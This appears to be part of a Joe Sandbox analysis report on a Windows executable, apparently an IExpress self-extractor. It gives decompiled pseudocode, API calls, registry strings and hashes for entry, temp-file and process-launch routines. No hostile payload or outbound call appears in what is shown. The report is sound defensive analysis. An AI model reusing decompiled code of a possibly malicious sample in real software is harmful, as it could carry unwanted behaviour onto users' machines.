                                                                                                                                                                                                                                                0x0005258b
                                                                                                                                                                                                                                                0x0005258b
                                                                                                                                                                                                                                                0x0005259e
                                                                                                                                                                                                                                                0x000525b2
                                                                                                                                                                                                                                                0x000525ba
                                                                                                                                                                                                                                                0x000525cb
                                                                                                                                                                                                                                                0x000525d1
                                                                                                                                                                                                                                                0x000525d6
                                                                                                                                                                                                                                                0x000525da
                                                                                                                                                                                                                                                0x000525dd
                                                                                                                                                                                                                                                0x000525dd
                                                                                                                                                                                                                                                0x000525e3
                                                                                                                                                                                                                                                0x000525e3
                                                                                                                                                                                                                                                0x000525e3
                                                                                                                                                                                                                                                0x0005258b
                                                                                                                                                                                                                                                0x00052589
                                                                                                                                                                                                                                                0x0005262f
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00054096,00054096,?,00051ED3,00000001,00000000,?,?,00054137,?), ref: 000525B2
                                                                                                                                                                                                                                                • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00054096,?,00051ED3,00000001,00000000,?,?,00054137,?,00054096), ref: 000525CB
                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,00051ED3,00000001,00000000,?,?,00054137,?,00054096), ref: 000525DD
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00054096,00054096,?,00051ED3,00000001,00000000,?,?,00054137,?), ref: 000525FF
                                                                                                                                                                                                                                                • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00054096,00000000,00000000,00000000,00000000,?,00051ED3,00000001,00000000), ref: 0005261A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • PendingFileRenameOperations, xrefs: 000525C3
                                                                                                                                                                                                                                                • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 000525F5
                                                                                                                                                                                                                                                • System\CurrentControlSet\Control\Session Manager, xrefs: 000525A8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                                • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                                • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                                • Opcode ID: 7e47fa0ddbe1efdd399bbf0d9f72f5b42787e96bd6d855381e528b58b5b672f3
                                                                                                                                                                                                                                                • Instruction ID: facd9ea0a34186123a22a55d498ad3deb1ba5d470825e1c11fd5bf6d0ea7533b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e47fa0ddbe1efdd399bbf0d9f72f5b42787e96bd6d855381e528b58b5b672f3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC118235A12228FBAB209B919C0DDFF7FBCEF027A3F504155BD08A2040DA304F48D6A1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00056A60 Relevance: 13.6, APIs: 9, Instructions: 138sleepCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 577 56a60-56a91 call 57155 call 57208 GetStartupInfoW 583 56a93-56aa2 577->583 584 56aa4-56aa6 583->584 585 56abc-56abe 583->585 586 56aaf-56aba Sleep 584->586 587 56aa8-56aad 584->587 588 56abf-56ac5 585->588 586->583 587->588 589 56ac7-56acf _amsg_exit 588->589 590 56ad1-56ad7 588->590 591 56b0b-56b11 589->591 592 56b05 590->592 593 56ad9-56ae9 call 56c3f 590->593 594 56b13-56b24 _initterm 591->594 595 56b2e-56b30 591->595 592->591 599 56aee-56af2 593->599 594->595 597 56b32-56b39 595->597 598 56b3b-56b42 595->598 597->598 600 56b44-56b51 call 57060 598->600 601 56b67-56b71 598->601 599->591 602 56af4-56b00 599->602 600->601 610 56b53-56b65 600->610 604 56b74-56b79 601->604 605 56c39-56c3e call 5724d 602->605 608 56bc5-56bc8 604->608 609 56b7b-56b7d 604->609 611 56bd6-56be3 _ismbblead 608->611 612 56bca-56bd3 608->612 614 56b94-56b98 609->614 615 56b7f-56b81 609->615 610->601 618 56be5-56be6 611->618 619 56be9-56bed 611->619 612->611 616 56ba0-56ba2 614->616 617 56b9a-56b9e 614->617 615->608 620 56b83-56b85 615->620 622 56ba3-56bbc call 52bfb 616->622 617->622 618->619 619->604 624 56c1e-56c25 619->624 620->614 621 56b87-56b8a 620->621 621->614 625 56b8c-56b92 621->625 622->624 630 56bbe-56bbf exit 622->630 627 56c27-56c2d _cexit 624->627 628 56c32 624->628 625->620 627->628 628->605 630->608
                                                                                                                                                                                                                                                C-Code - Quality: 51%
                                                                                                                                                                                                                                                			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E00057155();
				_push(0x58);
				_push(0x572b8);
				E00057208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x588b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x588b0; // 0x2
						if(__eflags != 0) {
							 *0x581e4 = _t58;
							goto L13;
						} else {
							 *0x588b0 = _t58;
							_t37 = E00056C3F(0x510b8, 0x510c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L00056FF4();
						L13:
						_t68 =  *0x588b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x510b4);
							_push(0x510ac);
							L00057202();
							 *0x588b0 = 2;
						}
						if(_t53 == 0) {
							 *0x588ac = 0;
						}
						_t71 =  *0x588b4;
						if( *0x588b4 != 0 && E00057060(_t71, 0x588b4) != 0) {
							_t60 =  *0x588b4; // 0x0
							 *0x5a288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x74895b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E00052BFB(0x50000, 0, _t59); // executed
							 *0x581e0 = _t30;
							__eflags =  *0x581f8;
							if( *0x581f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0x581e4;
							if( *0x581e4 == 0) {
								__imp___cexit();
								_t30 =  *0x581e0; // 0x80070002
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E0005724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}


















                                                                                                                                                                                                                                                0x00056a60
                                                                                                                                                                                                                                                0x00056a6a
                                                                                                                                                                                                                                                0x00056a6c
                                                                                                                                                                                                                                                0x00056a71
                                                                                                                                                                                                                                                0x00056a78
                                                                                                                                                                                                                                                0x00056a7f
                                                                                                                                                                                                                                                0x00056a85
                                                                                                                                                                                                                                                0x00056a8e
                                                                                                                                                                                                                                                0x00056a91
                                                                                                                                                                                                                                                0x00056a93
                                                                                                                                                                                                                                                0x00056a9c
                                                                                                                                                                                                                                                0x00056aa2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00056aa6
                                                                                                                                                                                                                                                0x00056ab4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00056aa8
                                                                                                                                                                                                                                                0x00056aaa
                                                                                                                                                                                                                                                0x00056aab
                                                                                                                                                                                                                                                0x00056aab
                                                                                                                                                                                                                                                0x00056abf
                                                                                                                                                                                                                                                0x00056abf
                                                                                                                                                                                                                                                0x00056ac5
                                                                                                                                                                                                                                                0x00056ad1
                                                                                                                                                                                                                                                0x00056ad7
                                                                                                                                                                                                                                                0x00056b05
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00056ad9
                                                                                                                                                                                                                                                0x00056ad9
                                                                                                                                                                                                                                                0x00056ae9
                                                                                                                                                                                                                                                0x00056af0
                                                                                                                                                                                                                                                0x00056af2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00056af4
                                                                                                                                                                                                                                                0x00056af4
                                                                                                                                                                                                                                                0x00056afb
                                                                                                                                                                                                                                                0x00056afb
                                                                                                                                                                                                                                                0x00056af2
                                                                                                                                                                                                                                                0x00056ac7
                                                                                                                                                                                                                                                0x00056ac7
                                                                                                                                                                                                                                                0x00056ac9
                                                                                                                                                                                                                                                0x00056b0b
                                                                                                                                                                                                                                                0x00056b0b
                                                                                                                                                                                                                                                0x00056b11
                                                                                                                                                                                                                                                0x00056b13
                                                                                                                                                                                                                                                0x00056b18
                                                                                                                                                                                                                                                0x00056b1d
                                                                                                                                                                                                                                                0x00056b24
                                                                                                                                                                                                                                                0x00056b24
                                                                                                                                                                                                                                                0x00056b30
                                                                                                                                                                                                                                                0x00056b39
                                                                                                                                                                                                                                                0x00056b39
                                                                                                                                                                                                                                                0x00056b3b
                                                                                                                                                                                                                                                0x00056b42
                                                                                                                                                                                                                                                0x00056b57
                                                                                                                                                                                                                                                0x00056b5f
                                                                                                                                                                                                                                                0x00056b65
                                                                                                                                                                                                                                                0x00056b65
                                                                                                                                                                                                                                                0x00056b67
                                                                                                                                                                                                                                                0x00056b6c
                                                                                                                                                                                                                                                0x00056b6e
                                                                                                                                                                                                                                                0x00056b71
                                                                                                                                                                                                                                                0x00056b74
                                                                                                                                                                                                                                                0x00056b74
                                                                                                                                                                                                                                                0x00056b79
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00056b7d
                                                                                                                                                                                                                                                0x00056b81
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00056b83
                                                                                                                                                                                                                                                0x00056b8c
                                                                                                                                                                                                                                                0x00056b8d
                                                                                                                                                                                                                                                0x00056b90
                                                                                                                                                                                                                                                0x00056b90
                                                                                                                                                                                                                                                0x00056b83
                                                                                                                                                                                                                                                0x00056b81
                                                                                                                                                                                                                                                0x00056b94
                                                                                                                                                                                                                                                0x00056b98
                                                                                                                                                                                                                                                0x00056ba2
                                                                                                                                                                                                                                                0x00056b9a
                                                                                                                                                                                                                                                0x00056b9a
                                                                                                                                                                                                                                                0x00056b9a
                                                                                                                                                                                                                                                0x00056ba3
                                                                                                                                                                                                                                                0x00056bab
                                                                                                                                                                                                                                                0x00056bb0
                                                                                                                                                                                                                                                0x00056bb5
                                                                                                                                                                                                                                                0x00056bbc
                                                                                                                                                                                                                                                0x00056bbf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00056bbf
                                                                                                                                                                                                                                                0x00056c1e
                                                                                                                                                                                                                                                0x00056c25
                                                                                                                                                                                                                                                0x00056c27
                                                                                                                                                                                                                                                0x00056c2d
                                                                                                                                                                                                                                                0x00056c2d
                                                                                                                                                                                                                                                0x00056c32
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00056bc5
                                                                                                                                                                                                                                                0x00056bc5
                                                                                                                                                                                                                                                0x00056bc8
                                                                                                                                                                                                                                                0x00056bcc
                                                                                                                                                                                                                                                0x00056bce
                                                                                                                                                                                                                                                0x00056bce
                                                                                                                                                                                                                                                0x00056bd1
                                                                                                                                                                                                                                                0x00056bd3
                                                                                                                                                                                                                                                0x00056bd3
                                                                                                                                                                                                                                                0x00056bd6
                                                                                                                                                                                                                                                0x00056bda
                                                                                                                                                                                                                                                0x00056be1
                                                                                                                                                                                                                                                0x00056be3
                                                                                                                                                                                                                                                0x00056be5
                                                                                                                                                                                                                                                0x00056be5
                                                                                                                                                                                                                                                0x00056be6
                                                                                                                                                                                                                                                0x00056be6
                                                                                                                                                                                                                                                0x00056be9
                                                                                                                                                                                                                                                0x00056bea
                                                                                                                                                                                                                                                0x00056bea
                                                                                                                                                                                                                                                0x00056b74
                                                                                                                                                                                                                                                0x00056c39
                                                                                                                                                                                                                                                0x00056c3e
                                                                                                                                                                                                                                                0x00056c3e
                                                                                                                                                                                                                                                0x00056abe
                                                                                                                                                                                                                                                0x00056abe
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00057155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00057182
                                                                                                                                                                                                                                                  • Part of subcall function 00057155: GetCurrentProcessId.KERNEL32 ref: 00057191
                                                                                                                                                                                                                                                  • Part of subcall function 00057155: GetCurrentThreadId.KERNEL32 ref: 0005719A
                                                                                                                                                                                                                                                  • Part of subcall function 00057155: GetTickCount.KERNEL32 ref: 000571A3
                                                                                                                                                                                                                                                  • Part of subcall function 00057155: QueryPerformanceCounter.KERNEL32(?), ref: 000571B8
                                                                                                                                                                                                                                                • GetStartupInfoW.KERNEL32(?,000572B8,00000058), ref: 00056A7F
                                                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 00056AB4
                                                                                                                                                                                                                                                • _amsg_exit.MSVCRT ref: 00056AC9
                                                                                                                                                                                                                                                • _initterm.MSVCRT ref: 00056B1D
                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00056B49
                                                                                                                                                                                                                                                • exit.KERNELBASE ref: 00056BBF
                                                                                                                                                                                                                                                • _ismbblead.MSVCRT ref: 00056BDA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 836923961-0
                                                                                                                                                                                                                                                • Opcode ID: 3e48443034216a41587359f86c90c73d517b980fa0f41dd2937d56f2c7a3a281
                                                                                                                                                                                                                                                • Instruction ID: 834ae31b787c34cbc142bc7a94a2ced88f73a8015663f3026cdb2e0ee24d26c8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e48443034216a41587359f86c90c73d517b980fa0f41dd2937d56f2c7a3a281
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4741E430A047258BFB619B68D8057BF7BE4EB45723F94811AED41E7291CF7A4C89CB81
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000558C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74memoryfileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 631 558c8-558d5 632 558d8-558dd 631->632 632->632 633 558df-558f1 LocalAlloc 632->633 634 558f3-55901 call 544b9 633->634 635 55919-55959 call 51680 call 5658a CreateFileA LocalFree 633->635 639 55906-55910 call 56285 634->639 635->639 645 5595b-5596c CloseHandle GetFileAttributesA 635->645 644 55912-55918 639->644 645->639 646 5596e-55970 645->646 646->639 647 55972-5597b 646->647 647->644
                                                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                                                			E000558C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E00051680(_t20, _t36, _t33);
					E0005658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x59124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E000544B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x59124 = E00056285();
					_t14 = 0;
				}
				return _t14;
			}













                                                                                                                                                                                                                                                0x000558cd
                                                                                                                                                                                                                                                0x000558d1
                                                                                                                                                                                                                                                0x000558d3
                                                                                                                                                                                                                                                0x000558d5
                                                                                                                                                                                                                                                0x000558d8
                                                                                                                                                                                                                                                0x000558d8
                                                                                                                                                                                                                                                0x000558da
                                                                                                                                                                                                                                                0x000558db
                                                                                                                                                                                                                                                0x000558e1
                                                                                                                                                                                                                                                0x000558ed
                                                                                                                                                                                                                                                0x000558f1
                                                                                                                                                                                                                                                0x0005591e
                                                                                                                                                                                                                                                0x0005592c
                                                                                                                                                                                                                                                0x00055943
                                                                                                                                                                                                                                                0x0005594a
                                                                                                                                                                                                                                                0x0005594d
                                                                                                                                                                                                                                                0x00055953
                                                                                                                                                                                                                                                0x00055959
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005595b
                                                                                                                                                                                                                                                0x0005595c
                                                                                                                                                                                                                                                0x00055963
                                                                                                                                                                                                                                                0x0005596c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055972
                                                                                                                                                                                                                                                0x00055974
                                                                                                                                                                                                                                                0x0005597a
                                                                                                                                                                                                                                                0x0005597a
                                                                                                                                                                                                                                                0x0005596c
                                                                                                                                                                                                                                                0x000558f3
                                                                                                                                                                                                                                                0x00055901
                                                                                                                                                                                                                                                0x00055906
                                                                                                                                                                                                                                                0x0005590b
                                                                                                                                                                                                                                                0x00055910
                                                                                                                                                                                                                                                0x00055910
                                                                                                                                                                                                                                                0x00055918

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00055534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 000558E7
                                                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00055534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00055943
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,00055534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0005594D
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00055534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0005595C
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00055534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00055963
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                                • API String ID: 747627703-2139698323
                                                                                                                                                                                                                                                • Opcode ID: 3d5e3ae4edbcfe55741b86d04297fd838b5c1886b783b020cdc9efc17c2de667
                                                                                                                                                                                                                                                • Instruction ID: 5e6d4a1a3c437bea16c5ec171a2c01d626ab89281c0e41c50b29d83e06f0c1b0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d5e3ae4edbcfe55741b86d04297fd838b5c1886b783b020cdc9efc17c2de667
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5113431700721ABE7201F7AAC0DBDB7E9DEF86363F100615F90AD31D1CE78980986A4
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00053FEF Relevance: 10.6, APIs: 7, Instructions: 97processsynchronizationwindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 675 53fef-54010 676 54016-5403b CreateProcessA 675->676 677 5410a-5411a call 56ce0 675->677 678 540c4-54101 call 56285 GetLastError FormatMessageA call 544b9 676->678 679 54041-5406e WaitForSingleObject GetExitCodeProcess 676->679 691 54106 678->691 682 54091 call 5411b 679->682 683 54070-54077 679->683 690 54096-540b8 CloseHandle * 2 682->690 683->682 686 54079-5407b 683->686 686->682 689 5407d-54089 686->689 689->682 692 5408b 689->692 693 54108 690->693 694 540ba-540c0 690->694 691->693 692->682 693->677 694->693 695 540c2 694->695 695->691
                                                                                                                                                                                                                                                C-Code - Quality: 84%
                                                                                                                                                                                                                                                			E00053FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x58004; // 0x5a679bd9
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00056CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x59124 = E00056285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
					_t45 = 0x4c4;
					E000544B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x58a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0x59a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0x59a2c = _t44;
						}
					}
				}
				E0005411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0x59a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}


















                                                                                                                                                                                                                                                0x00053fef
                                                                                                                                                                                                                                                0x00053ffa
                                                                                                                                                                                                                                                0x00054001
                                                                                                                                                                                                                                                0x00054008
                                                                                                                                                                                                                                                0x0005400a
                                                                                                                                                                                                                                                0x0005400b
                                                                                                                                                                                                                                                0x00054010
                                                                                                                                                                                                                                                0x0005410a
                                                                                                                                                                                                                                                0x0005411a
                                                                                                                                                                                                                                                0x0005411a
                                                                                                                                                                                                                                                0x0005401c
                                                                                                                                                                                                                                                0x0005401d
                                                                                                                                                                                                                                                0x0005401e
                                                                                                                                                                                                                                                0x0005401f
                                                                                                                                                                                                                                                0x00054033
                                                                                                                                                                                                                                                0x0005403b
                                                                                                                                                                                                                                                0x000540ca
                                                                                                                                                                                                                                                0x000540e9
                                                                                                                                                                                                                                                0x000540f8
                                                                                                                                                                                                                                                0x00054101
                                                                                                                                                                                                                                                0x00054106
                                                                                                                                                                                                                                                0x00054106
                                                                                                                                                                                                                                                0x00054108
                                                                                                                                                                                                                                                0x00054108
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054108
                                                                                                                                                                                                                                                0x00054049
                                                                                                                                                                                                                                                0x0005405c
                                                                                                                                                                                                                                                0x00054062
                                                                                                                                                                                                                                                0x00054068
                                                                                                                                                                                                                                                0x0005406e
                                                                                                                                                                                                                                                0x00054070
                                                                                                                                                                                                                                                0x00054077
                                                                                                                                                                                                                                                0x0005407f
                                                                                                                                                                                                                                                0x00054089
                                                                                                                                                                                                                                                0x0005408b
                                                                                                                                                                                                                                                0x0005408b
                                                                                                                                                                                                                                                0x00054089
                                                                                                                                                                                                                                                0x00054077
                                                                                                                                                                                                                                                0x00054091
